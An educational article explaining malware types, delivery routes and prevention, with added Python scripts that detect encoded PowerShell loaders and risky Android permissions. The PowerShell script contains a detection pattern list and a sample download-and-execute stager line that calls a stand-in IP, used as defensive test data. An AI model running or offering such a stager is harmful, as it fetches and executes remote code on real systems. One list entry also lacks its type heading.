What is malware? By definition, «malicious software» is any working code written specifically to damage a device, steal data, or get at your money. The damage varies widely: from theft to encryption (followed by a ransom demand), from hijacked social media accounts to every cent of your savings transferred into a criminal's pocket. Back in the 90s and early 2000s all such programs were called "viruses"; since a virus is technically only one kind of malware, the more neutral umbrella term is used today.
There is a lot of malware. Almost 600,000 new samples are detected every day, and over 1 billion are currently active. Mobile phones are hit hardest: according to Kaspersky Security Network, in the first quarter of 2021 it detected almost 1.5 million mobile malware installation packages, most of them adware, with mobile banking trojans (the ones that steal your money) in second place.
There are two main kinds of malware attack. In an automatic attack the malware self-replicates according to its pre-programmed logic: after infecting a PC or smartphone it uses that machine as a jumping-off point for further spread. In a manually coordinated attack, hackers go after a specific target, a company, a factory or even a city administration, and typically use phishing to deliver the malware into the system.
The main delivery routes are: phishing (luring emails or messages carrying a malicious link or attachment), unpatched system vulnerabilities, infected websites (where the malicious code tries to sneak onto your device every time the page loads, a so-called drive-by download), infected torrents, and other scenarios built on social engineering.
Today the most common types of malware are computer viruses, ransomware, worms, trojan horses and spyware. There are also hybrids, or polyfunctional malware, which combine several kinds of threat in one. And there are stranger, hard-to-detect kinds: polymorphic malware, which rewrites its own code with every infection so that signature scanners fail to recognise it, and fileless malware, which lives only in a system's RAM and leaves nothing on disk to scan. Below are details on the 11 most common types, to keep you informed about the very real threats on today's web.
Type: Adware
What it does: serves unwanted advertisements, typically by hijacking the browser's search settings or injecting ads into pages
Delivered: bundled with torrents and untrusted apps, via email
Notable examples: Fireball, DeskAd
Type: Backdoor
What it does: gives an attacker persistent remote access to a computer, bypassing normal authentication
Delivered: as a component of a trojan, or via phishing as a separate program
Notable examples: FinSpy, Zacinlo
Type: Botnet
What it does: infects IoT devices and other gadgets and later uses them as cannon fodder for DDoS attacks
Delivered: automatically, via exploits and factory-default credentials (the Mirai approach)
Notable examples: Echobot, Mirai family
Type: Computer worm
What it does: spreads across a network by copying itself without any user interaction, and often carries a damaging payload
Delivered: self-propagating through unpatched security holes
Notable examples: Stuxnet, Mydoom
Type: Fileless malware
What it does: runs in memory and abuses legitimate system tools (scripting hosts, the registry, WMI) instead of dropping an executable on disk, so file-based scanners have little to inspect
Delivered: mainly phishing
Notable examples: Astaroth, SamSam, Meterpreter
What it does: steals data, sometimes followed by a ransom demand
Delivered: as a component of other malware, via phishing, or via untrusted apps
Notable examples: TrickBot
Type: Keylogger
What it does: records the user's keystrokes (passwords, card numbers, messages) and sends them to the attacker
Delivered: Business Email Compromise, phishing
Notable examples: Olympic Vision
Type: Cryptominer (cryptojacking)
What it does: uses the host's CPU or GPU to mine cryptocurrency for the attacker
Delivered: via untrusted apps, torrents, phishing
Notable examples: CoinMiner, MrbMiner
Type: Ransomware
What it does: encrypts and/or steals data, then demands a ransom in cryptocurrency (never pay it: payment funds the next campaign and does not guarantee a working decryptor)
Delivered: many routes: exploit kits, scan-and-exploit of Internet-facing services, exposed RDP servers, backdoored software installers and classic phishing
Notable examples: REvil (also known as Sodinokibi), the successor of GandCrab
Type: Spyware
What it does: silently monitors what the user does (browsing, messages, location, credentials) and reports it to its operator
Delivered: via phishing and untrusted apps
Notable examples: DarkHotel, Internet Optimizer, CoolWebSearch
Type: Trojan horse
What it does: poses as legitimate software, then hands the attacker control of the device once installed
Delivered: via untrusted apps, torrents, phishing
Notable examples: IcedID, Pegasus, Cerberus, Emotet, Dridex
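Why the fileless entry above is so hard for a file scanner: the loader is usually a one-liner handed to a script host such as PowerShell, with the real payload Base64-encoded on the command line and fetched straight into memory, so the disk never sees an executable. The following is an added example, not code from the original page, that decodes that kind of encoded command and flags the classic in-memory download-and-execute pattern across a few constructed command lines. The indicator list and the sample lines are assumptions made for this example, not a vendor signature set.

```python
import base64
import re

# Loader fragments that commonly appear when a script is pulled down and run
# straight from memory. This list is an assumption chosen for the example,
# not a vendor signature set.
LOADER_FRAGMENT_RE = re.compile(
    r"\b(?:iex|invoke-expression|downloadstring|net\.webclient|"
    r"frombase64string|invoke-webrequest|reflection\.assembly)\b",
    re.IGNORECASE,
)

# PowerShell accepts -e, -ec, -enc and -EncodedCommand for a Base64-encoded
# (UTF-16LE) script; group 1 captures the blob that follows the flag.
ENCODED_FLAG_RE = re.compile(
    r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE
)
HIDDEN_WINDOW_RE = re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.IGNORECASE)


def encode_for_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects it (Base64 over UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str):
    """Reverse that encoding; return None if the blob is not valid Base64/UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(cmdline: str) -> dict:
    """Collect indicators for one process command line."""
    indicators = []
    decoded = None
    match = ENCODED_FLAG_RE.search(cmdline)
    if match:
        indicators.append("encoded-command")
        decoded = decode_encoded_command(match.group(1))
    if HIDDEN_WINDOW_RE.search(cmdline):
        indicators.append("hidden-window")
    # Search the visible command line and whatever the encoded blob expands to.
    haystack = cmdline + " " + (decoded or "")
    for frag in LOADER_FRAGMENT_RE.findall(haystack):
        indicators.append("fragment:" + frag.lower())
    # One indicator alone is common in legitimate administration; require two.
    return {
        "cmdline": cmdline,
        "decoded": decoded,
        "indicators": indicators,
        "suspicious": len(indicators) >= 2,
    }


def scan(cmdlines) -> list:
    """Return the analysis records for every command line judged suspicious."""
    return [record for record in map(analyze, cmdlines) if record["suspicious"]]


# Constructed sample command lines, shaped like the command-line field of a
# process-creation log. They were written for this example.
SAMPLE_COMMAND_LINES = [
    # Legitimate scheduled admin script: bypasses execution policy but nothing else.
    r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\ops\rotate-logs.ps1",
    # In-memory stager: hidden window plus an encoded download-and-execute one-liner.
    "powershell.exe -nop -w hidden -enc "
    + encode_for_powershell(
        "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/stage1')"
    ),
    # Ordinary interactive use.
    "powershell.exe Get-Service -Name Spooler",
]

if __name__ == "__main__":
    for record in scan(SAMPLE_COMMAND_LINES):
        print("SUSPICIOUS:", record["indicators"])
        print("  decoded:", record["decoded"])
```

Feed it real data by passing the command-line field of process-creation events (Sysmon event ID 1, or Windows event 4688 with command-line auditing enabled) to scan(). The first sample line is a legitimate admin script and is deliberately not flagged: a single indicator such as an execution-policy bypass is everyday noise, which is why two are required before a line is called suspicious.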
What to do to avoid meeting these guys:
- Always run anti-malware security software, and keep it updated.
- Don't download files or apps from dubious places. Even with official stores (like Google Play), think twice before installing something and, for mobile apps, always check which permissions the app demands: a flashlight that wants to read your SMS is a red flag.
- Don't click that link. Or that pop-up. Or that file attached to the suspicious e-mail.
- Keep backups of all important information, and keep at least one copy offline where ransomware cannot reach it.
- Use a password manager and/or strong, unique passwords. Always change the default credentials on everything.
- Update everything that can be updated, promptly, so you are not the victim of an exploit for a bug that was already fixed.
- Stay aware of current cyber threats so you are ready for the encounter.
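The permission check from the list above, worked through for Android as an added example that is not part of the original page: the script reads a decoded AndroidManifest.xml (the text form a tool such as apktool produces from an APK) and flags the capabilities that mobile banking trojans rely on: reading or intercepting SMS one-time codes, drawing over other apps, and driving the screen through an Accessibility service. Both manifests below are constructed for the example, and the risk list is an assumption, not a complete taxonomy.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Capabilities that banking trojans and spyware depend on. The list and the
# wording are assumptions chosen for this example, not a complete taxonomy.
HIGH_RISK_PERMISSIONS = {
    "android.permission.READ_SMS": "read stored SMS, including one-time codes",
    "android.permission.RECEIVE_SMS": "intercept incoming SMS",
    "android.permission.SYSTEM_ALERT_WINDOW": "draw over other apps (fake login overlays)",
    "android.permission.BIND_ACCESSIBILITY_SERVICE": "read the screen and drive the UI",
    "android.permission.BIND_DEVICE_ADMIN": "device-administrator powers (hard to uninstall)",
    "android.permission.REQUEST_INSTALL_PACKAGES": "install further packages",
}


def declared_permissions(manifest_xml: str) -> set:
    """Return every permission the manifest requests or binds a component to."""
    root = ET.fromstring(manifest_xml)
    perms = {
        el.get(ANDROID_NS + "name")
        for el in root.iter("uses-permission")
        if el.get(ANDROID_NS + "name")
    }
    # Accessibility and device-admin services are not requested through
    # <uses-permission>; they appear as android:permission on the component.
    for el in root.iter():
        bound = el.get(ANDROID_NS + "permission")
        if bound:
            perms.add(bound)
    return perms


def assess(manifest_xml: str) -> dict:
    """Summarise which high-risk capabilities an app declares."""
    perms = declared_permissions(manifest_xml)
    flagged = {
        p: HIGH_RISK_PERMISSIONS[p] for p in sorted(perms) if p in HIGH_RISK_PERMISSIONS
    }
    return {
        "declared": sorted(perms),
        "flagged": flagged,
        "verdict": "review before installing" if flagged else "no high-risk permissions",
    }


# Constructed manifests for the example (decoded text, as apktool would produce).
# A "flashlight" that wants SMS, overlays and an Accessibility service.
SUSPICIOUS_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.flashlight">
    <uses-permission android:name="android.permission.CAMERA"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
    <application android:label="Flashlight">
        <service android:name=".Helper"
            android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
            <intent-filter>
                <action android:name="android.accessibilityservice.AccessibilityService"/>
            </intent-filter>
        </service>
    </application>
</manifest>"""

# The same app asking only for what a flashlight plausibly needs.
BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.flashlight">
    <uses-permission android:name="android.permission.CAMERA"/>
    <application android:label="Flashlight"/>
</manifest>"""

if __name__ == "__main__":
    for label, manifest in (("suspicious", SUSPICIOUS_MANIFEST), ("benign", BENIGN_MANIFEST)):
        result = assess(manifest)
        print(label, "->", result["verdict"])
        for perm, why in result["flagged"].items():
            print("   ", perm, ":", why)
```

The useful signal is the mismatch between what the app claims to be and what it asks for: a flashlight has no business with SMS or the Accessibility API. The same reasoning applies when the store's install dialog lists the permissions, only here it is scripted so a whole batch of APKs can be triaged before they reach a phone.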
Malware is one of the most dangerous threats to mankind these days, when all critical infrastructure depends on computers. It causes billions of dollars of economic damage each year through system failures, wasted resources and corrupted data.
It also makes life significantly harder for ordinary internet users. However, if you follow the simple rules listed above, your chances of meeting malware will be relatively low. So do it and stay safe!